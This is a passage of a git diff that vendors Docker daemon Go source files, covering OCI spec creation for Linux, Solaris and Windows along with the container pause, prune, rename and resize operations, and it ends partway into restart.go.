userMounts[m.Destination]; !ok { + if mountDev && strings.HasPrefix(m.Destination, "/dev/") { + continue + } + defaultMounts = append(defaultMounts, m) 
+ } + } + + s.Mounts = defaultMounts + for _, m := range mounts { + for _, cm := range s.Mounts { + if cm.Destination == m.Destination { + return fmt.Errorf("Duplicate mount point '%s'", m.Destination) + } + } + + if m.Source == "tmpfs" { + data := m.Data + options := []string{"noexec", "nosuid", "nodev", string(volume.DefaultPropagationMode)} + if data != "" { + options = append(options, strings.Split(data, ",")...) + } + + merged, err := mount.MergeTmpfsOptions(options) + if err != nil { + return err + } + + s.Mounts = append(s.Mounts, specs.Mount{Destination: m.Destination, Source: m.Source, Type: "tmpfs", Options: merged}) + continue + } + + mt := specs.Mount{Destination: m.Destination, Source: m.Source, Type: "bind"} + + // Determine property of RootPropagation based on volume + // properties. If a volume is shared, then keep root propagation + // shared. This should work for slave and private volumes too. + // + // For slave volumes, it can be either [r]shared/[r]slave. + // + // For private volumes any root propagation value should work. 
+ pFlag := mountPropagationMap[m.Propagation] + if pFlag == mount.SHARED || pFlag == mount.RSHARED { + if err := ensureShared(m.Source); err != nil { + return err + } + rootpg := mountPropagationMap[s.Linux.RootfsPropagation] + if rootpg != mount.SHARED && rootpg != mount.RSHARED { + s.Linux.RootfsPropagation = mountPropagationReverseMap[mount.SHARED] + } + } else if pFlag == mount.SLAVE || pFlag == mount.RSLAVE { + if err := ensureSharedOrSlave(m.Source); err != nil { + return err + } + rootpg := mountPropagationMap[s.Linux.RootfsPropagation] + if rootpg != mount.SHARED && rootpg != mount.RSHARED && rootpg != mount.SLAVE && rootpg != mount.RSLAVE { + s.Linux.RootfsPropagation = mountPropagationReverseMap[mount.RSLAVE] + } + } + + opts := []string{"rbind"} + if !m.Writable { + opts = append(opts, "ro") + } + if pFlag != 0 { + opts = append(opts, mountPropagationReverseMap[pFlag]) + } + + mt.Options = opts + s.Mounts = append(s.Mounts, mt) + } + + if s.Root.Readonly { + for i, m := range s.Mounts { + switch m.Destination { + case "/proc", "/dev/pts", "/dev/mqueue": // /dev is remounted by runc + continue + } + if _, ok := userMounts[m.Destination]; !ok { + if !stringutils.InSlice(m.Options, "ro") { + s.Mounts[i].Options = append(s.Mounts[i].Options, "ro") + } + } + } + } + + if c.HostConfig.Privileged { + if !s.Root.Readonly { + // clear readonly for /sys + for i := range s.Mounts { + if s.Mounts[i].Destination == "/sys" { + clearReadOnly(&s.Mounts[i]) + } + } + } + s.Linux.ReadonlyPaths = nil + s.Linux.MaskedPaths = nil + } + + // TODO: until a kernel/mount solution exists for handling remount in a user namespace, + // we must clear the readonly flag for the cgroups mount (@mrunalp concurs) + if uidMap, _ := daemon.GetUIDGIDMaps(); uidMap != nil || c.HostConfig.Privileged { + for i, m := range s.Mounts { + if m.Type == "cgroup" { + clearReadOnly(&s.Mounts[i]) + } + } + } + + return nil +} + +func (daemon *Daemon) populateCommonSpec(s *specs.Spec, c 
*container.Container) error { + linkedEnv, err := daemon.setupLinkedContainers(c) + if err != nil { + return err + } + s.Root = specs.Root{ + Path: c.BaseFS, + Readonly: c.HostConfig.ReadonlyRootfs, + } + rootUID, rootGID := daemon.GetRemappedUIDGID() + if err := c.SetupWorkingDirectory(rootUID, rootGID); err != nil { + return err + } + cwd := c.Config.WorkingDir + if len(cwd) == 0 { + cwd = "/" + } + s.Process.Args = append([]string{c.Path}, c.Args...) + + // only add the custom init if it is specified and the container is running in its + // own private pid namespace. It does not make sense to add if it is running in the + // host namespace or another container's pid namespace where we already have an init + if c.HostConfig.PidMode.IsPrivate() { + if (c.HostConfig.Init != nil && *c.HostConfig.Init) || + (c.HostConfig.Init == nil && daemon.configStore.Init) { + s.Process.Args = append([]string{"/dev/init", "--", c.Path}, c.Args...) + var path string + if daemon.configStore.InitPath == "" && c.HostConfig.InitPath == "" { + path, err = exec.LookPath(DefaultInitBinary) + if err != nil { + return err + } + } + if daemon.configStore.InitPath != "" { + path = daemon.configStore.InitPath + } + if c.HostConfig.InitPath != "" { + path = c.HostConfig.InitPath + } + s.Mounts = append(s.Mounts, specs.Mount{ + Destination: "/dev/init", + Type: "bind", + Source: path, + Options: []string{"bind", "ro"}, + }) + } + } + s.Process.Cwd = cwd + s.Process.Env = c.CreateDaemonEnvironment(c.Config.Tty, linkedEnv) + s.Process.Terminal = c.Config.Tty + s.Hostname = c.FullHostname() + + return nil +} + +func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { + s := oci.DefaultSpec() + if err := daemon.populateCommonSpec(&s, c); err != nil { + return nil, err + } + + var cgroupsPath string + scopePrefix := "docker" + parent := "/docker" + useSystemd := UsingSystemd(daemon.configStore) + if useSystemd { + parent = "system.slice" + } + + if c.HostConfig.CgroupParent != 
"" { + parent = c.HostConfig.CgroupParent + } else if daemon.configStore.CgroupParent != "" { + parent = daemon.configStore.CgroupParent + } + + if useSystemd { + cgroupsPath = parent + ":" + scopePrefix + ":" + c.ID + logrus.Debugf("createSpec: cgroupsPath: %s", cgroupsPath) + } else { + cgroupsPath = filepath.Join(parent, c.ID) + } + s.Linux.CgroupsPath = &cgroupsPath + + if err := setResources(&s, c.HostConfig.Resources); err != nil { + return nil, fmt.Errorf("linux runtime spec resources: %v", err) + } + s.Linux.Resources.OOMScoreAdj = &c.HostConfig.OomScoreAdj + s.Linux.Sysctl = c.HostConfig.Sysctls + + p := *s.Linux.CgroupsPath + if useSystemd { + initPath, err := cgroups.GetInitCgroupDir("cpu") + if err != nil { + return nil, err + } + p, _ = cgroups.GetThisCgroupDir("cpu") + if err != nil { + return nil, err + } + p = filepath.Join(initPath, p) + } + + // Clean path to guard against things like ../../../BAD + parentPath := filepath.Dir(p) + if !filepath.IsAbs(parentPath) { + parentPath = filepath.Clean("/" + parentPath) + } + + if err := daemon.initCgroupsPath(parentPath); err != nil { + return nil, fmt.Errorf("linux init cgroups path: %v", err) + } + if err := setDevices(&s, c); err != nil { + return nil, fmt.Errorf("linux runtime spec devices: %v", err) + } + if err := setRlimits(daemon, &s, c); err != nil { + return nil, fmt.Errorf("linux runtime spec rlimits: %v", err) + } + if err := setUser(&s, c); err != nil { + return nil, fmt.Errorf("linux spec user: %v", err) + } + if err := setNamespaces(daemon, &s, c); err != nil { + return nil, fmt.Errorf("linux spec namespaces: %v", err) + } + if err := setCapabilities(&s, c); err != nil { + return nil, fmt.Errorf("linux spec capabilities: %v", err) + } + if err := setSeccomp(daemon, &s, c); err != nil { + return nil, fmt.Errorf("linux seccomp: %v", err) + } + + if err := daemon.setupIpcDirs(c); err != nil { + return nil, err + } + + if err := daemon.setupSecretDir(c); err != nil { + return nil, err + } + + 
ms, err := daemon.setupMounts(c) + if err != nil { + return nil, err + } + + ms = append(ms, c.IpcMounts()...) + + tmpfsMounts, err := c.TmpfsMounts() + if err != nil { + return nil, err + } + ms = append(ms, tmpfsMounts...) + + if m := c.SecretMount(); m != nil { + ms = append(ms, *m) + } + + sort.Sort(mounts(ms)) + if err := setMounts(daemon, &s, c, ms); err != nil { + return nil, fmt.Errorf("linux mounts: %v", err) + } + + for _, ns := range s.Linux.Namespaces { + if ns.Type == "network" && ns.Path == "" && !c.Config.NetworkDisabled { + target, err := os.Readlink(filepath.Join("/proc", strconv.Itoa(os.Getpid()), "exe")) + if err != nil { + return nil, err + } + + s.Hooks = specs.Hooks{ + Prestart: []specs.Hook{{ + Path: target, // FIXME: cross-platform + Args: []string{"libnetwork-setkey", c.ID, daemon.netController.ID()}, + }}, + } + } + } + + if apparmor.IsEnabled() { + var appArmorProfile string + if c.AppArmorProfile != "" { + appArmorProfile = c.AppArmorProfile + } else if c.HostConfig.Privileged { + appArmorProfile = "unconfined" + } else { + appArmorProfile = "docker-default" + } + + if appArmorProfile == "docker-default" { + // Unattended upgrades and other fun services can unload AppArmor + // profiles inadvertently. Since we cannot store our profile in + // /etc/apparmor.d, nor can we practically add other ways of + // telling the system to keep our profile loaded, in order to make + // sure that we keep the default profile enabled we dynamically + // reload it if necessary. 
+ if err := ensureDefaultAppArmorProfile(); err != nil { + return nil, err + } + } + + s.Process.ApparmorProfile = appArmorProfile + } + s.Process.SelinuxLabel = c.GetProcessLabel() + s.Process.NoNewPrivileges = c.NoNewPrivileges + s.Linux.MountLabel = c.MountLabel + + return (*specs.Spec)(&s), nil +} + +func clearReadOnly(m *specs.Mount) { + var opt []string + for _, o := range m.Options { + if o != "ro" { + opt = append(opt, o) + } + } + m.Options = opt +} + +// mergeUlimits merge the Ulimits from HostConfig with daemon defaults, and update HostConfig +func (daemon *Daemon) mergeUlimits(c *containertypes.HostConfig) { + ulimits := c.Ulimits + // Merge ulimits with daemon defaults + ulIdx := make(map[string]struct{}) + for _, ul := range ulimits { + ulIdx[ul.Name] = struct{}{} + } + for name, ul := range daemon.configStore.Ulimits { + if _, exists := ulIdx[name]; !exists { + ulimits = append(ulimits, ul) + } + } + c.Ulimits = ulimits +} diff --git a/vendor/github.com/docker/docker/daemon/oci_solaris.go b/vendor/github.com/docker/docker/daemon/oci_solaris.go new file mode 100644 index 0000000000..0c757f9196 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/oci_solaris.go @@ -0,0 +1,188 @@ +package daemon + +import ( + "fmt" + "path/filepath" + "sort" + "strconv" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/oci" + "github.com/docker/libnetwork" + "github.com/opencontainers/runtime-spec/specs-go" +) + +func setResources(s *specs.Spec, r containertypes.Resources) error { + mem := getMemoryResources(r) + s.Solaris.CappedMemory = &mem + + capCPU := getCPUResources(r) + s.Solaris.CappedCPU = &capCPU + + return nil +} + +func setUser(s *specs.Spec, c *container.Container) error { + uid, gid, additionalGids, err := getUser(c, c.Config.User) + if err != nil { + return err + } + s.Process.User.UID = uid + s.Process.User.GID = gid + s.Process.User.AdditionalGids = additionalGids + 
return nil +} + +func getUser(c *container.Container, username string) (uint32, uint32, []uint32, error) { + return 0, 0, nil, nil +} + +func (daemon *Daemon) getRunzAnet(ep libnetwork.Endpoint) (specs.Anet, error) { + var ( + linkName string + lowerLink string + defRouter string + ) + + epInfo := ep.Info() + if epInfo == nil { + return specs.Anet{}, fmt.Errorf("invalid endpoint") + } + + nw, err := daemon.GetNetworkByName(ep.Network()) + if err != nil { + return specs.Anet{}, fmt.Errorf("Failed to get network %s: %v", ep.Network(), err) + } + + // Evaluate default router, linkname and lowerlink for interface endpoint + switch nw.Type() { + case "bridge": + defRouter = epInfo.Gateway().String() + linkName = "net0" // Should always be net0 for a container + + // TODO We construct lowerlink here exactly as done for solaris bridge + // initialization. Need modular code to reuse. + options := nw.Info().DriverOptions() + nwName := options["com.docker.network.bridge.name"] + lastChar := nwName[len(nwName)-1:] + if _, err = strconv.Atoi(lastChar); err != nil { + lowerLink = nwName + "_0" + } else { + lowerLink = nwName + } + + case "overlay": + defRouter = "" + linkName = "net1" + + // TODO Follows generateVxlanName() in solaris overlay. 
+ id := nw.ID() + if len(nw.ID()) > 12 { + id = nw.ID()[:12] + } + lowerLink = "vx_" + id + "_0" + } + + runzanet := specs.Anet{ + Linkname: linkName, + Lowerlink: lowerLink, + Allowedaddr: epInfo.Iface().Address().String(), + Configallowedaddr: "true", + Defrouter: defRouter, + Linkprotection: "mac-nospoof, ip-nospoof", + Macaddress: epInfo.Iface().MacAddress().String(), + } + + return runzanet, nil +} + +func (daemon *Daemon) setNetworkInterface(s *specs.Spec, c *container.Container) error { + var anets []specs.Anet + + sb, err := daemon.netController.SandboxByID(c.NetworkSettings.SandboxID) + if err != nil { + return fmt.Errorf("Could not obtain sandbox for container") + } + + // Populate interfaces required for each endpoint + for _, ep := range sb.Endpoints() { + runzanet, err := daemon.getRunzAnet(ep) + if err != nil { + return fmt.Errorf("Failed to get interface information for endpoint %d: %v", ep.ID(), err) + } + anets = append(anets, runzanet) + } + + s.Solaris.Anet = anets + if anets != nil { + s.Solaris.Milestone = "svc:/milestone/container:default" + } + return nil +} + +func (daemon *Daemon) populateCommonSpec(s *specs.Spec, c *container.Container) error { + linkedEnv, err := daemon.setupLinkedContainers(c) + if err != nil { + return err + } + s.Root = specs.Root{ + Path: filepath.Dir(c.BaseFS), + Readonly: c.HostConfig.ReadonlyRootfs, + } + rootUID, rootGID := daemon.GetRemappedUIDGID() + if err := c.SetupWorkingDirectory(rootUID, rootGID); err != nil { + return err + } + cwd := c.Config.WorkingDir + s.Process.Args = append([]string{c.Path}, c.Args...) 
+ s.Process.Cwd = cwd + s.Process.Env = c.CreateDaemonEnvironment(c.Config.Tty, linkedEnv) + s.Process.Terminal = c.Config.Tty + s.Hostname = c.FullHostname() + + return nil +} + +func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { + s := oci.DefaultSpec() + if err := daemon.populateCommonSpec(&s, c); err != nil { + return nil, err + } + + if err := setResources(&s, c.HostConfig.Resources); err != nil { + return nil, fmt.Errorf("runtime spec resources: %v", err) + } + + if err := setUser(&s, c); err != nil { + return nil, fmt.Errorf("spec user: %v", err) + } + + if err := daemon.setNetworkInterface(&s, c); err != nil { + return nil, err + } + + if err := daemon.setupIpcDirs(c); err != nil { + return nil, err + } + + ms, err := daemon.setupMounts(c) + if err != nil { + return nil, err + } + ms = append(ms, c.IpcMounts()...) + tmpfsMounts, err := c.TmpfsMounts() + if err != nil { + return nil, err + } + ms = append(ms, tmpfsMounts...) + sort.Sort(mounts(ms)) + + return (*specs.Spec)(&s), nil +} + +// mergeUlimits merge the Ulimits from HostConfig with daemon defaults, and update HostConfig +// It will do nothing on non-Linux platform +func (daemon *Daemon) mergeUlimits(c *containertypes.HostConfig) { + return +} diff --git a/vendor/github.com/docker/docker/daemon/oci_windows.go b/vendor/github.com/docker/docker/daemon/oci_windows.go new file mode 100644 index 0000000000..6e264243b4 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/oci_windows.go @@ -0,0 +1,122 @@ +package daemon + +import ( + "syscall" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/oci" + "github.com/docker/docker/pkg/sysinfo" + "github.com/opencontainers/runtime-spec/specs-go" +) + +func (daemon *Daemon) createSpec(c *container.Container) (*specs.Spec, error) { + s := oci.DefaultSpec() + + linkedEnv, err := daemon.setupLinkedContainers(c) + if err != nil { + return nil, err + } 
+ + // Note, unlike Unix, we do NOT call into SetupWorkingDirectory as + // this is done in VMCompute. Further, we couldn't do it for Hyper-V + // containers anyway. + + // In base spec + s.Hostname = c.FullHostname() + + // In s.Mounts + mounts, err := daemon.setupMounts(c) + if err != nil { + return nil, err + } + for _, mount := range mounts { + m := specs.Mount{ + Source: mount.Source, + Destination: mount.Destination, + } + if !mount.Writable { + m.Options = append(m.Options, "ro") + } + s.Mounts = append(s.Mounts, m) + } + + // In s.Process + s.Process.Args = append([]string{c.Path}, c.Args...) + if !c.Config.ArgsEscaped { + s.Process.Args = escapeArgs(s.Process.Args) + } + s.Process.Cwd = c.Config.WorkingDir + if len(s.Process.Cwd) == 0 { + // We default to C:\ to workaround the oddity of the case that the + // default directory for cmd running as LocalSystem (or + // ContainerAdministrator) is c:\windows\system32. Hence docker run + // cmd will by default end in c:\windows\system32, rather + // than 'root' (/) on Linux. The oddity is that if you have a dockerfile + // which has no WORKDIR and has a COPY file ., . will be interpreted + // as c:\. Hence, setting it to default of c:\ makes for consistency. + s.Process.Cwd = `C:\` + } + s.Process.Env = c.CreateDaemonEnvironment(c.Config.Tty, linkedEnv) + s.Process.ConsoleSize.Height = c.HostConfig.ConsoleSize[0] + s.Process.ConsoleSize.Width = c.HostConfig.ConsoleSize[1] + s.Process.Terminal = c.Config.Tty + s.Process.User.Username = c.Config.User + + // In spec.Root. This is not set for Hyper-V containers + isHyperV := false + if c.HostConfig.Isolation.IsDefault() { + // Container using default isolation, so take the default from the daemon configuration + isHyperV = daemon.defaultIsolation.IsHyperV() + } else { + // Container may be requesting an explicit isolation mode. 
+ isHyperV = c.HostConfig.Isolation.IsHyperV() + } + if !isHyperV { + s.Root.Path = c.BaseFS + } + s.Root.Readonly = false // Windows does not support a read-only root filesystem + + // In s.Windows.Resources + // @darrenstahlmsft implement these resources + cpuShares := uint16(c.HostConfig.CPUShares) + cpuPercent := uint8(c.HostConfig.CPUPercent) + if c.HostConfig.NanoCPUs > 0 { + cpuPercent = uint8(c.HostConfig.NanoCPUs * 100 / int64(sysinfo.NumCPU()) / 1e9) + } + cpuCount := uint64(c.HostConfig.CPUCount) + memoryLimit := uint64(c.HostConfig.Memory) + s.Windows.Resources = &specs.WindowsResources{ + CPU: &specs.WindowsCPUResources{ + Percent: &cpuPercent, + Shares: &cpuShares, + Count: &cpuCount, + }, + Memory: &specs.WindowsMemoryResources{ + Limit: &memoryLimit, + //TODO Reservation: ..., + }, + Network: &specs.WindowsNetworkResources{ + //TODO Bandwidth: ..., + }, + Storage: &specs.WindowsStorageResources{ + Bps: &c.HostConfig.IOMaximumBandwidth, + Iops: &c.HostConfig.IOMaximumIOps, + }, + } + return (*specs.Spec)(&s), nil +} + +func escapeArgs(args []string) []string { + escapedArgs := make([]string, len(args)) + for i, a := range args { + escapedArgs[i] = syscall.EscapeArg(a) + } + return escapedArgs +} + +// mergeUlimits merge the Ulimits from HostConfig with daemon defaults, and update HostConfig +// It will do nothing on non-Linux platform +func (daemon *Daemon) mergeUlimits(c *containertypes.HostConfig) { + return +} diff --git a/vendor/github.com/docker/docker/daemon/pause.go b/vendor/github.com/docker/docker/daemon/pause.go new file mode 100644 index 0000000000..dbfafbc5fd --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/pause.go @@ -0,0 +1,49 @@ +package daemon + +import ( + "fmt" + + "github.com/docker/docker/container" +) + +// ContainerPause pauses a container +func (daemon *Daemon) ContainerPause(name string) error { + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + + if err := 
daemon.containerPause(container); err != nil { + return err + } + + return nil +} + +// containerPause pauses the container execution without stopping the process. +// The execution can be resumed by calling containerUnpause. +func (daemon *Daemon) containerPause(container *container.Container) error { + container.Lock() + defer container.Unlock() + + // We cannot Pause the container which is not running + if !container.Running { + return errNotRunning{container.ID} + } + + // We cannot Pause the container which is already paused + if container.Paused { + return fmt.Errorf("Container %s is already paused", container.ID) + } + + // We cannot Pause the container which is restarting + if container.Restarting { + return errContainerIsRestarting(container.ID) + } + + if err := daemon.containerd.Pause(container.ID); err != nil { + return fmt.Errorf("Cannot pause container %s: %s", container.ID, err) + } + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/prune.go b/vendor/github.com/docker/docker/daemon/prune.go new file mode 100644 index 0000000000..a693beb4e1 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/prune.go @@ -0,0 +1,236 @@ +package daemon + +import ( + "fmt" + "regexp" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/directory" + "github.com/docker/docker/reference" + "github.com/docker/docker/runconfig" + "github.com/docker/docker/volume" + "github.com/docker/libnetwork" +) + +// ContainersPrune removes unused containers +func (daemon *Daemon) ContainersPrune(pruneFilters filters.Args) (*types.ContainersPruneReport, error) { + rep := &types.ContainersPruneReport{} + + allContainers := daemon.List() + for _, c := range allContainers { + if !c.IsRunning() { + cSize, _ := daemon.getSize(c) + // TODO: sets RmLink to true? 
+ err := daemon.ContainerRm(c.ID, &types.ContainerRmConfig{}) + if err != nil { + logrus.Warnf("failed to prune container %s: %v", c.ID, err) + continue + } + if cSize > 0 { + rep.SpaceReclaimed += uint64(cSize) + } + rep.ContainersDeleted = append(rep.ContainersDeleted, c.ID) + } + } + + return rep, nil +} + +// VolumesPrune removes unused local volumes +func (daemon *Daemon) VolumesPrune(pruneFilters filters.Args) (*types.VolumesPruneReport, error) { + rep := &types.VolumesPruneReport{} + + pruneVols := func(v volume.Volume) error { + name := v.Name() + refs := daemon.volumes.Refs(v) + + if len(refs) == 0 { + vSize, err := directory.Size(v.Path()) + if err != nil { + logrus.Warnf("could not determine size of volume %s: %v", name, err) + } + err = daemon.volumes.Remove(v) + if err != nil { + logrus.Warnf("could not remove volume %s: %v", name, err) + return nil + } + rep.SpaceReclaimed += uint64(vSize) + rep.VolumesDeleted = append(rep.VolumesDeleted, name) + } + + return nil + } + + err := daemon.traverseLocalVolumes(pruneVols) + + return rep, err +} + +// ImagesPrune removes unused images +func (daemon *Daemon) ImagesPrune(pruneFilters filters.Args) (*types.ImagesPruneReport, error) { + rep := &types.ImagesPruneReport{} + + danglingOnly := true + if pruneFilters.Include("dangling") { + if pruneFilters.ExactMatch("dangling", "false") || pruneFilters.ExactMatch("dangling", "0") { + danglingOnly = false + } else if !pruneFilters.ExactMatch("dangling", "true") && !pruneFilters.ExactMatch("dangling", "1") { + return nil, fmt.Errorf("Invalid filter 'dangling=%s'", pruneFilters.Get("dangling")) + } + } + + var allImages map[image.ID]*image.Image + if danglingOnly { + allImages = daemon.imageStore.Heads() + } else { + allImages = daemon.imageStore.Map() + } + allContainers := daemon.List() + imageRefs := map[string]bool{} + for _, c := range allContainers { + imageRefs[c.ID] = true + } + + // Filter intermediary images and get their unique size + allLayers := 
daemon.layerStore.Map() + topImages := map[image.ID]*image.Image{} + for id, img := range allImages { + dgst := digest.Digest(id) + if len(daemon.referenceStore.References(dgst)) == 0 && len(daemon.imageStore.Children(id)) != 0 { + continue + } + topImages[id] = img + } + + for id := range topImages { + dgst := digest.Digest(id) + hex := dgst.Hex() + if _, ok := imageRefs[hex]; ok { + continue + } + + deletedImages := []types.ImageDelete{} + refs := daemon.referenceStore.References(dgst) + if len(refs) > 0 { + if danglingOnly { + // Not a dangling image + continue + } + + nrRefs := len(refs) + for _, ref := range refs { + // If nrRefs == 1, we have an image marked as myreponame: + // i.e. the tag content was changed + if _, ok := ref.(reference.Canonical); ok && nrRefs > 1 { + continue + } + imgDel, err := daemon.ImageDelete(ref.String(), false, true) + if err != nil { + logrus.Warnf("could not delete reference %s: %v", ref.String(), err) + continue + } + deletedImages = append(deletedImages, imgDel...) + } + } else { + imgDel, err := daemon.ImageDelete(hex, false, true) + if err != nil { + logrus.Warnf("could not delete image %s: %v", hex, err) + continue + } + deletedImages = append(deletedImages, imgDel...) + } + + rep.ImagesDeleted = append(rep.ImagesDeleted, deletedImages...) + } + + // Compute how much space was freed + for _, d := range rep.ImagesDeleted { + if d.Deleted != "" { + chid := layer.ChainID(d.Deleted) + if l, ok := allLayers[chid]; ok { + diffSize, err := l.DiffSize() + if err != nil { + logrus.Warnf("failed to get layer %s size: %v", chid, err) + continue + } + rep.SpaceReclaimed += uint64(diffSize) + } + } + } + + return rep, nil +} + +// localNetworksPrune removes unused local networks +func (daemon *Daemon) localNetworksPrune(pruneFilters filters.Args) (*types.NetworksPruneReport, error) { + rep := &types.NetworksPruneReport{} + var err error + // When the function returns true, the walk will stop. 
+ l := func(nw libnetwork.Network) bool { + nwName := nw.Name() + predefined := runconfig.IsPreDefinedNetwork(nwName) + if !predefined && len(nw.Endpoints()) == 0 { + if err = daemon.DeleteNetwork(nw.ID()); err != nil { + logrus.Warnf("could not remove network %s: %v", nwName, err) + return false + } + rep.NetworksDeleted = append(rep.NetworksDeleted, nwName) + } + return false + } + daemon.netController.WalkNetworks(l) + return rep, err +} + +// clusterNetworksPrune removes unused cluster networks +func (daemon *Daemon) clusterNetworksPrune(pruneFilters filters.Args) (*types.NetworksPruneReport, error) { + rep := &types.NetworksPruneReport{} + cluster := daemon.GetCluster() + networks, err := cluster.GetNetworks() + if err != nil { + return rep, err + } + networkIsInUse := regexp.MustCompile(`network ([[:alnum:]]+) is in use`) + for _, nw := range networks { + if nw.Name == "ingress" { + continue + } + // https://github.com/docker/docker/issues/24186 + // `docker network inspect` unfortunately displays ONLY those containers that are local to that node. + // So we try to remove it anyway and check the error + err = cluster.RemoveNetwork(nw.ID) + if err != nil { + // we can safely ignore the "network .. is in use" error + match := networkIsInUse.FindStringSubmatch(err.Error()) + if len(match) != 2 || match[1] != nw.ID { + logrus.Warnf("could not remove network %s: %v", nw.Name, err) + } + continue + } + rep.NetworksDeleted = append(rep.NetworksDeleted, nw.Name) + } + return rep, nil +} + +// NetworksPrune removes unused networks +func (daemon *Daemon) NetworksPrune(pruneFilters filters.Args) (*types.NetworksPruneReport, error) { + rep := &types.NetworksPruneReport{} + clusterRep, err := daemon.clusterNetworksPrune(pruneFilters) + if err != nil { + logrus.Warnf("could not remove cluster networks: %v", err) + } else { + rep.NetworksDeleted = append(rep.NetworksDeleted, clusterRep.NetworksDeleted...) 
+ } + localRep, err := daemon.localNetworksPrune(pruneFilters) + if err != nil { + logrus.Warnf("could not remove local networks: %v", err) + } else { + rep.NetworksDeleted = append(rep.NetworksDeleted, localRep.NetworksDeleted...) + } + return rep, err +} diff --git a/vendor/github.com/docker/docker/daemon/rename.go b/vendor/github.com/docker/docker/daemon/rename.go new file mode 100644 index 0000000000..ffb7715f23 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/rename.go @@ -0,0 +1,122 @@ +package daemon + +import ( + "fmt" + "strings" + + "github.com/Sirupsen/logrus" + dockercontainer "github.com/docker/docker/container" + "github.com/docker/libnetwork" +) + +// ContainerRename changes the name of a container, using the oldName +// to find the container. An error is returned if newName is already +// reserved. +func (daemon *Daemon) ContainerRename(oldName, newName string) error { + var ( + sid string + sb libnetwork.Sandbox + ) + + if oldName == "" || newName == "" { + return fmt.Errorf("Neither old nor new names may be empty") + } + + if newName[0] != '/' { + newName = "/" + newName + } + + container, err := daemon.GetContainer(oldName) + if err != nil { + return err + } + + oldName = container.Name + oldIsAnonymousEndpoint := container.NetworkSettings.IsAnonymousEndpoint + + if oldName == newName { + return fmt.Errorf("Renaming a container with the same name as its current name") + } + + container.Lock() + defer container.Unlock() + + links := map[string]*dockercontainer.Container{} + for k, v := range daemon.linkIndex.children(container) { + if !strings.HasPrefix(k, oldName) { + return fmt.Errorf("Linked container %s does not match parent %s", k, oldName) + } + links[strings.TrimPrefix(k, oldName)] = v + } + + if newName, err = daemon.reserveName(container.ID, newName); err != nil { + return fmt.Errorf("Error when allocating new name: %v", err) + } + + for k, v := range links { + daemon.nameIndex.Reserve(newName+k, v.ID) + 
daemon.linkIndex.link(container, v, newName+k) + } + + container.Name = newName + container.NetworkSettings.IsAnonymousEndpoint = false + + defer func() { + if err != nil { + container.Name = oldName + container.NetworkSettings.IsAnonymousEndpoint = oldIsAnonymousEndpoint + daemon.reserveName(container.ID, oldName) + for k, v := range links { + daemon.nameIndex.Reserve(oldName+k, v.ID) + daemon.linkIndex.link(container, v, oldName+k) + daemon.linkIndex.unlink(newName+k, v, container) + daemon.nameIndex.Release(newName + k) + } + daemon.releaseName(newName) + } + }() + + for k, v := range links { + daemon.linkIndex.unlink(oldName+k, v, container) + daemon.nameIndex.Release(oldName + k) + } + daemon.releaseName(oldName) + if err = container.ToDisk(); err != nil { + return err + } + + attributes := map[string]string{ + "oldName": oldName, + } + + if !container.Running { + daemon.LogContainerEventWithAttributes(container, "rename", attributes) + return nil + } + + defer func() { + if err != nil { + container.Name = oldName + container.NetworkSettings.IsAnonymousEndpoint = oldIsAnonymousEndpoint + if e := container.ToDisk(); e != nil { + logrus.Errorf("%s: Failed in writing to Disk on rename failure: %v", container.ID, e) + } + } + }() + + sid = container.NetworkSettings.SandboxID + if daemon.netController != nil { + sb, err = daemon.netController.SandboxByID(sid) + if err != nil { + return err + } + + err = sb.Rename(strings.TrimPrefix(container.Name, "/")) + if err != nil { + return err + } + } + + daemon.LogContainerEventWithAttributes(container, "rename", attributes) + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/resize.go b/vendor/github.com/docker/docker/daemon/resize.go new file mode 100644 index 0000000000..747353852e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/resize.go @@ -0,0 +1,40 @@ +package daemon + +import ( + "fmt" + + "github.com/docker/docker/libcontainerd" +) + +// ContainerResize changes the size of the TTY of the 
process running +// in the container with the given name to the given height and width. +func (daemon *Daemon) ContainerResize(name string, height, width int) error { + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + + if !container.IsRunning() { + return errNotRunning{container.ID} + } + + if err = daemon.containerd.Resize(container.ID, libcontainerd.InitFriendlyName, width, height); err == nil { + attributes := map[string]string{ + "height": fmt.Sprintf("%d", height), + "width": fmt.Sprintf("%d", width), + } + daemon.LogContainerEventWithAttributes(container, "resize", attributes) + } + return err +} + +// ContainerExecResize changes the size of the TTY of the process +// running in the exec with the given name to the given height and +// width. +func (daemon *Daemon) ContainerExecResize(name string, height, width int) error { + ec, err := daemon.getExecConfig(name) + if err != nil { + return err + } + return daemon.containerd.Resize(ec.ContainerID, ec.ID, width, height) +} diff --git a/vendor/github.com/docker/docker/daemon/restart.go b/vendor/github.com/docker/docker/daemon/restart.go new file mode 100644 index 0000000000..79292f3752 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/restart.go @@ -0,0 +1,70 @@ +package daemon + +import ( + "fmt" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/container" +) + +// ContainerRestart stops and starts a container. It attempts to +// gracefully stop the container within the given timeout, forcefully +// stopping it if the timeout is exceeded. If given a negative +// timeout, ContainerRestart will wait forever until a graceful +// stop. Returns an error if the container cannot be found, or if +// there is an underlying error at any stage of the restart. 
